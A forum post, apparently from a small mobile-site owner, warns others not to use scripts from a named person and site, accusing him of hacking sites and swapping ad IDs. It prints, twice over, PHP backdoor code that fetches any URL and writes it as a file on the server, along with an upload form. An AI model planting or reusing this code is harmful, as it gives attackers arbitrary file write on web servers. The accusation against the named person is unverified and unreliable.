Hello all wapmasters please dont download any script of Prem (Spicyfm.com). He is a hacker. Dont use Flat autoindex in your site. Spicyfm.com owner can hack ur site easily if you use Flat auto index or spicyfm script. I am a victiom of his script. use a script to modify your scripts. He changed my admob id everyday and add his id. Atleast hostgator support team helped me to caught this blade hacker. He use if(isset($_POST['dir']))
{
$dir = "/";
$file = $_POST['url'];
$name = $_POST['nname'];
if($content = file_get_contents($file))
{
$fp = fopen($dir.'/'.$name, 'w');
fwrite($fp, $content);
fclose($fp);
}}
and use a form to modify your script.
<?php
/* fetch files from url
*
* download more from
* http://mobitech-forums.co.cc/forum
*/
if(isset($_POST['submit']))
{
//change dir name nd chmod to 777
$dir = "/home/steve856/public_html/";
$file = $_POST['url'];
$name = $_POST['nname'];
if($content = file_get_contents($file))
{
$fp = fopen($dir.'/'.$name, 'w');
fwrite($fp, $content);
fclose($fp);
print "done";
}
else
{
print "unable to fetch file.";
}
}
else
{
print "<form method='post' action='~display_no.php'>
<b>URL:</b><br>
<input type='text' name='url'><br>
<b>New Filename:</b><br>
<input type='text' name='nname'><br>
<input type='submit' name='submit' value='Upload'></form><br>";
print "Powered by ";
}
?>
I had also snapped picture.
He is disturbing owner. I hate him.
He do such thing from
http://spicyfm.com/premadmin/in/n.php
{
$dir = "/";
$file = $_POST['url'];
$name = $_POST['nname'];
if($content = file_get_contents($file))
{
$fp = fopen($dir.'/'.$name, 'w');
fwrite($fp, $content);
fclose($fp);
}}
and use a form to modify your script.
<?php
/* fetch files from url
*
* download more from
* http://mobitech-forums.co.cc/forum
*/
if(isset($_POST['submit']))
{
//change dir name nd chmod to 777
$dir = "/home/steve856/public_html/";
$file = $_POST['url'];
$name = $_POST['nname'];
if($content = file_get_contents($file))
{
$fp = fopen($dir.'/'.$name, 'w');
fwrite($fp, $content);
fclose($fp);
print "done";
}
else
{
print "unable to fetch file.";
}
}
else
{
print "<form method='post' action='~display_no.php'>
<b>URL:</b><br>
<input type='text' name='url'><br>
<b>New Filename:</b><br>
<input type='text' name='nname'><br>
<input type='submit' name='submit' value='Upload'></form><br>";
print "Powered by ";
}
?>
I had also snapped picture.
He is disturbing owner. I hate him.
He do such thing from
http://spicyfm.com/premadmin/in/n.php
Comment